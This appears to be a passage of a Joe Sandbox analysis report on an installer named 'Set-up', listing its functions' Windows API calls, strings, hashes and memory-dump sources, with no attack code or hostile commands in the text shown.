                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Exception@8Throw$DirectoryLibraryLoadSystem
                                                                                                                                  • String ID: !m_hDll$DllLoader::Init$GetSystemDirectory()$GetSystemWow64Directory()$LoadLibraryEx()
                                                                                                                                  • API String ID: 2172637159-1744778925
                                                                                                                                  • Opcode ID: cea775fe15b5c678427740e8a2a9f3d3e1ef2b5390c90aef4b115a57c4ea441f
                                                                                                                                  • Instruction ID: 0c1ab309c50967174d1740ddaa52b615a04a66082ebedbc2634549ea10d7f4c3
                                                                                                                                  • Opcode Fuzzy Hash: cea775fe15b5c678427740e8a2a9f3d3e1ef2b5390c90aef4b115a57c4ea441f
                                                                                                                                  • Instruction Fuzzy Hash: A381B171E04209ABDF28EFA4DC46BEEB7B8EF14305F004569E911B7280DBB55948CBA0
                                                                                                                                  Function 00E521E0 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 228COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(T6,?,?,00000105,?,460C02D8,00000001,?,?), ref: 00E52241
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E5230D
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5233C
                                                                                                                                  • GetUserProfileDirectoryW.USERENV(?,00000000,?,460C02D8,?,?), ref: 00E52396
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,460C02D8,?,?), ref: 00E523A0
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E523D6
                                                                                                                                  • GetUserProfileDirectoryW.USERENV(?,00000000,00000000,00000000,?,00000000,?,460C02D8,?,?), ref: 00E5241C
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,00000000,00000000,00000000,?,00000000,?,460C02D8,?,?), ref: 00E52428
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$DirectoryException@8ProfileThrowUser$FileModuleName
                                                                                                                                  • String ID: !af_$GetModuleFileName()$GetUserProfileDirectoryW(first)$GetUserProfileDirectoryW(second)$T6$datavect<wchar_t>::size
                                                                                                                                  • API String ID: 258523341-4036657018
                                                                                                                                  • Opcode ID: d2d6bb96a5c450bb5e39c0aa5268480378ec79fa45bc08cb08d028c550cc8622
                                                                                                                                  • Instruction ID: 85d9fcffc2ba28bec8ef340dc89071da598cad7baa20fb18931f8c8fdfbdff1b
                                                                                                                                  • Opcode Fuzzy Hash: d2d6bb96a5c450bb5e39c0aa5268480378ec79fa45bc08cb08d028c550cc8622
                                                                                                                                  • Instruction Fuzzy Hash: 9871C171A00209ABDB24DFA5CC45BEEBBF8EF05704F00446DE915F7280D7B5A908CBA1
                                                                                                                                  Function 00E5A150 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 193COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetSidLengthRequired.ADVAPI32(?,460C02D8,?), ref: 00E5A189
                                                                                                                                  • InitializeSid.ADVAPI32(00000001,?,?,00000000,?,?), ref: 00E5A1DB
                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000001,00000000), ref: 00E5A202
                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000001,00000001), ref: 00E5A233
                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000001,00000002), ref: 00E5A264
                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000001,00000003), ref: 00E5A296
                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000001,00000004), ref: 00E5A2C8
                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000001,00000005), ref: 00E5A2FA
                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000001,00000006), ref: 00E5A32C
                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000001,00000007), ref: 00E5A35E
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5A3DA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Authority$Exception@8InitializeLengthRequiredThrow
                                                                                                                                  • String ID: !af_$Sid::Set() - invalid subauthority count ($datavect<unsigned char>::begin
                                                                                                                                  • API String ID: 2891347615-1191388841
                                                                                                                                  • Opcode ID: 78d922905a1da279f22b1f433db9a1d8bf7f80a6bdb709ae260d37b353212795
                                                                                                                                  • Instruction ID: 868589c2389d268252de34adcd0904e5e9bab0756e89ef312d04d402e5f545f7
                                                                                                                                  • Opcode Fuzzy Hash: 78d922905a1da279f22b1f433db9a1d8bf7f80a6bdb709ae260d37b353212795
                                                                                                                                  • Instruction Fuzzy Hash: 1061E371A90304EBDB399F20EC4BF4D7BE6AB11B05F14442CF905762E5E7B11948CB62
                                                                                                                                  Function 00E6F8D0 Relevance: 23.1, APIs: 5, Strings: 8, Instructions: 371registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E6D2C0: GetCurrentProcess.KERNEL32(?,?,?,?,00000000), ref: 00E6D3DB
                                                                                                                                  • RegDeleteValueW.ADVAPI32(?,00000000,?,00000000,?,00000002,00000000,00000000,?,?,460C02D8), ref: 00E6F98B
                                                                                                                                  • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00E6FA69
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6FAB6
                                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00000000), ref: 00E6FB78
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6FCAA
                                                                                                                                    • Part of subcall function 00E44630: IsDebuggerPresent.KERNEL32(460C02D8,0131B928,?,?), ref: 00E4465E
                                                                                                                                    • Part of subcall function 00E44630: DebugBreak.KERNEL32 ref: 00E44668
                                                                                                                                    • Part of subcall function 00E44630: GetModuleFileNameA.KERNEL32(00000000,?,0000012B), ref: 00E446D2
                                                                                                                                    • Part of subcall function 00E44630: Concurrency::cancel_current_task.LIBCPMT ref: 00E44742
                                                                                                                                    • Part of subcall function 00E44630: GetCurrentProcessId.KERNEL32(00000000,?,, PID ,00000006,9.39,00000004,', version ,?,00000000,Ensure check failed in module ',0000001F,-000000C7), ref: 00E447C5
                                                                                                                                    • Part of subcall function 00E44630: GetCurrentThreadId.KERNEL32 ref: 00E44809
                                                                                                                                    • Part of subcall function 00E6CE60: RegCloseKey.ADVAPI32(012A03EC,460C02D8,?), ref: 00E6CEA1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$Exception@8ProcessThrowValue$BreakCloseConcurrency::cancel_current_taskDebugDebuggerDeleteEnumFileInfoModuleNamePresentQueryThread
                                                                                                                                  • String ID: !af_$NumCast$RegDeleteValueW()$RegEnumValueW()$RegQueryInfoKeyW()$datavect<struct WWLib::RegItem *>::size$ncvector<struct WWLib::RegItem>::reserve$value >= 0
                                                                                                                                  • API String ID: 1777080608-3490134241
                                                                                                                                  • Opcode ID: 8466a22cc23080f57d6507c2a94a1801c389faf59d71f83ea754640215567cc2
                                                                                                                                  • Instruction ID: 26344f8f2c7dd8e1b07c126c81d5d9a614a91906df48c67977bf72259ed5b423
                                                                                                                                  • Opcode Fuzzy Hash: 8466a22cc23080f57d6507c2a94a1801c389faf59d71f83ea754640215567cc2
                                                                                                                                  • Instruction Fuzzy Hash: C4D1AFB0A40248EFDF14DFA4E955BAEBBF8FF04748F144069E915BB281D775AA04CB90
                                                                                                                                  Function 00F11410 Relevance: 23.1, APIs: 5, Strings: 8, Instructions: 342COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  • datavect<unsigned int>::size, xrefs: 00F11727
                                                                                                                                  • Oid::FromStr() - value too large, xrefs: 00F11575
                                                                                                                                  • !af_, xrefs: 00F1172C
                                                                                                                                  • Oid::FromStr() - invalid character, expecting '.', xrefs: 00F11537
                                                                                                                                  • datavect<unsigned int>::operator [], xrefs: 00F11762
                                                                                                                                  • ..., xrefs: 00F11736
                                                                                                                                  • !af_ && i<s_, xrefs: 00F11767
                                                                                                                                  • Oid::FromStr() - invalid character, expecting a decimal digit, xrefs: 00F115AD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !af_$!af_ && i<s_$...$Oid::FromStr() - invalid character, expecting '.'$Oid::FromStr() - invalid character, expecting a decimal digit$Oid::FromStr() - value too large$datavect<unsigned int>::operator []$datavect<unsigned int>::size
                                                                                                                                  • API String ID: 0-669650995
                                                                                                                                  • Opcode ID: 6a5ff065f91e0450632c195c277ee1f3b7f9c1917e4f0466d51a8c1b4e03a207
                                                                                                                                  • Instruction ID: cabad9e75d3accbf1ccfd3a02fe13e2f8185d9e46aa855594d9e180a19fb8d72
                                                                                                                                  • Opcode Fuzzy Hash: 6a5ff065f91e0450632c195c277ee1f3b7f9c1917e4f0466d51a8c1b4e03a207
                                                                                                                                  • Instruction Fuzzy Hash: 95C1E271E002099BDF18DFA5C855BEEB7B8FF55724F14422CE522A72C0EB71AA44CB91
                                                                                                                                  Function 00E45090 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 158threadsynchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InterlockedCompareExchange.KERNEL32(0131AB84,00000001,00000000), ref: 00E450CE
                                                                                                                                  • SwitchToThread.KERNEL32(?,460C02D8,?,0111BC80,012C04F8,000000FE,?,00E3A8D6,460C02D8), ref: 00E450F2
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,460C02D8,?,0111BC80,012C04F8,000000FE,?,00E3A8D6,460C02D8), ref: 00E4512C
                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000006,00E44D40,0111BC80,?,460C02D8,?,0111BC80,012C04F8,000000FE,?,00E3A8D6,460C02D8), ref: 00E45140
                                                                                                                                  • GetModuleFileNameW.KERNEL32(0111BC80,0131AB88,0000012C,?,460C02D8,?,0111BC80,012C04F8,000000FE,?,00E3A8D6,460C02D8), ref: 00E4515B
                                                                                                                                  • GetFileAttributesW.KERNEL32(0131AB88,?,460C02D8,?,0111BC80,012C04F8,000000FE,?,00E3A8D6,460C02D8), ref: 00E451BD
                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,460C02D8,?,0111BC80,012C04F8,000000FE,?,00E3A8D6,460C02D8), ref: 00E451DC
                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,460C02D8,?,0111BC80,012C04F8,000000FE,?,00E3A8D6,460C02D8), ref: 00E451F7
                                                                                                                                  • CreateMutexW.KERNEL32(00000000,00000000,00000000,?,460C02D8,?,0111BC80,012C04F8,000000FE,?,00E3A8D6,460C02D8), ref: 00E4520C
                                                                                                                                  • CreateThread.KERNEL32(00000000,00010000,00E44D40,00000000,00010000,?), ref: 00E45232
                                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00E45250
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Create$EventFileHandleModuleThread$AttributesCallCloseCompareExchangeFilterFunc@8InterlockedMutexNameSwitch
                                                                                                                                  • String ID: BvDump32.exe
                                                                                                                                  • API String ID: 2090855902-3057195707
                                                                                                                                  • Opcode ID: a126b02e97cf0d74787231af62d75569a494f3cadb03c76ea36f7b9a0f0a12e2
                                                                                                                                  • Instruction ID: 23e116691e1106140157e8851e56a466088b3344039c3272e9e52a7b47befa14
                                                                                                                                  • Opcode Fuzzy Hash: a126b02e97cf0d74787231af62d75569a494f3cadb03c76ea36f7b9a0f0a12e2
                                                                                                                                  • Instruction Fuzzy Hash: 9B510532684B45ABEB259F68BC45BAE77B8F744725F14012BF912F72C1D7B1A400CB54
                                                                                                                                  Function 00E5A720 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 97memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 00E5A731
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00E5A740
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E5A752
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5A77D
                                                                                                                                  • GetLastError.KERNEL32(?,01303710,SecurityDescriptor: LocalAlloc()), ref: 00E5A782
                                                                                                                                  • LocalFree.KERNEL32 ref: 00E5A78C
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5A7B9
                                                                                                                                  • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000001), ref: 00E5A7D0
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,?,00000001), ref: 00E5A7E2
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5A80D
                                                                                                                                  Strings
                                                                                                                                  • SecurityDescriptor: LocalAlloc(), xrefs: 00E5A760
                                                                                                                                  • SetSecurityDescriptorOwner(), xrefs: 00E5A7F0
                                                                                                                                  • InitializeSecurityDescriptor(), xrefs: 00E5A79C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorException@8LastThrow$DescriptorLocalSecurity$AllocFreeInitializeOwner
                                                                                                                                  • String ID: InitializeSecurityDescriptor()$SecurityDescriptor: LocalAlloc()$SetSecurityDescriptorOwner()
                                                                                                                                  • API String ID: 921255989-1898077872
                                                                                                                                  • Opcode ID: 6a7b1600e9da99ce6cd42cbcc1a8526d292f2aa293527a992008d1534d3e7862
                                                                                                                                  • Instruction ID: 5d0816d798ecdacdd254a9ce564d64d46dbf083ddf434bdf08755c8695eb3ffe
                                                                                                                                  • Opcode Fuzzy Hash: 6a7b1600e9da99ce6cd42cbcc1a8526d292f2aa293527a992008d1534d3e7862
                                                                                                                                  • Instruction Fuzzy Hash: B7210D316503057BC624BA759C4BF5A3BACAF44756F000938FE14E61C4EFB1A40CC7A6
                                                                                                                                  Function 00F03C10 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F03C72
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockShared), ref: 00F03C80
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00F03C91
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockShared), ref: 00F03CA2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00F03CB3
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00F03CC4
                                                                                                                                    • Part of subcall function 00E4DE80: VerSetConditionMask.KERNEL32 ref: 00E4DEE3
                                                                                                                                    • Part of subcall function 00E4DE80: VerSetConditionMask.KERNEL32(00000000), ref: 00E4DEEB
                                                                                                                                    • Part of subcall function 00E4DE80: VerSetConditionMask.KERNEL32(00000000), ref: 00E4DEF3
                                                                                                                                  • InitializeCriticalSection.KERNEL32(0131C07C), ref: 00F03D05
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
